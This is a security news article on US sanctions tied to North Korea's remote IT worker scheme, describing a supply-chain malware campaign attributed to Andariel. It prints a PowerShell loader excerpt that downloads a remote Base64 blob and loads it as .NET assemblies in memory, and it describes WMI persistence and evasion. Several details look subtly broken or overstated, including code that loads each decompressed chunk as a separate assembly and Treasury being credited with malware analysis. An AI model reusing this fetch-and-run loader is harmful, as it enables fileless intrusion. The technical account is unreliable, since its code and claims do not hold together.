US Sanction Key Threat Actors Linked With North Korea’s Remote IT Worker Scheme
The U.S. Treasury’s July 8 action against Song Kum Hyok and four Russia-based entities pulled back the curtain on a sophisticated malware-enabled revenue pipeline that has quietly bankrolled Pyongyang’s weapons programs for years.
Investigators trace the campaign to Andariel, a Reconnaissance General Bureau (RGB) sub-unit already notorious for high-value cryptocurrency heists.
By embedding North Korean developers inside legitimate software projects, the group obtained persistent, code-signing access to corporate repositories and CI/CD pipelines, allowing malicious updates to ride trusted channels.
Within weeks of onboarding, the rogue contractors began seeding an innocuous-looking JavaScript dependency that, once compiled, side-loaded a PowerShell stager to contact *.china-cdn[.]org, a domain masquerading as a content mirror.
The U.S. Department of the Treasury analysts noted the stager’s beacon interval dynamically shifts between 90 and 600 seconds, thwarting traffic-shape baselines.
The same analysts identified that every build job reaching GitHub Actions runners after March 2025 contained the altered dependency—evidence that supply-chain poisoning rather than spear-phishing was the preferred attack vector.
Victims span fintech, healthcare, and industrial IoT vendors on three continents; in several cases, corrupted binaries were pushed to over-the-air update servers, effectively weaponizing routine patch cycles.
Treated devices later funneled telemetry, clipboard data, and cryptocurrency wallet files to Andariel’s command tier, compressing exfiltrated content with LZNT1 before AES-256 encryption. Treasury researchers noted the group monetized stolen wallets directly, while other data was sold in Russian underground markets.
Memory-Resident Loader
The initial JavaScript implant merely fetches a Base64-encoded blob stored in a GitHub Gist referenced as “worker-resume.txt”.
The blob expands into a four-stage PowerShell script that never touches disk, leveraging Add-Type
to compile C# inline and hijack the Windows Management Instrumentation service for persistence.
A condensed excerpt illustrates the crucial hand-off:-
$raw = Invoke-RestMethod $gurl
$bytes = [System.Convert]::FromBase64String($raw)
$decomp = [System.IO.Compression.DeflateStream]::new(
[System.IO.MemoryStream]::new($bytes), 'Decompress')
$buf = New-Object byte[] 0x2000
while(($len = $decomp.Read($buf,0,$buf.Length)) -gt 0){
[System.Reflection.Assembly]::Load($buf[0..($len-1)]) | Out-Null
}
Start-Sleep (Get-Random -Min 90 -Max 600)
Each execution loads an encrypted .NET payload directly into memory, thwarting traditional file-based antivirus scans and leaving only volatile artifacts in amsi.dll
hooks.
The malign DLL then registers an event consumer under root\subscription
, ensuring revival after reboots without creating new services or registry run-keys—an evasion tactic that kept host-based detection rates below 5 percent in VirusTotal submissions through June 2025.
Continued sanctions pressure will complicate cash-out avenues, yet the campaign’s low footprint underscores why remote contractor workflows remain an attractive, hard-to-audit conduit for state-sponsored malware operators.
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
Source link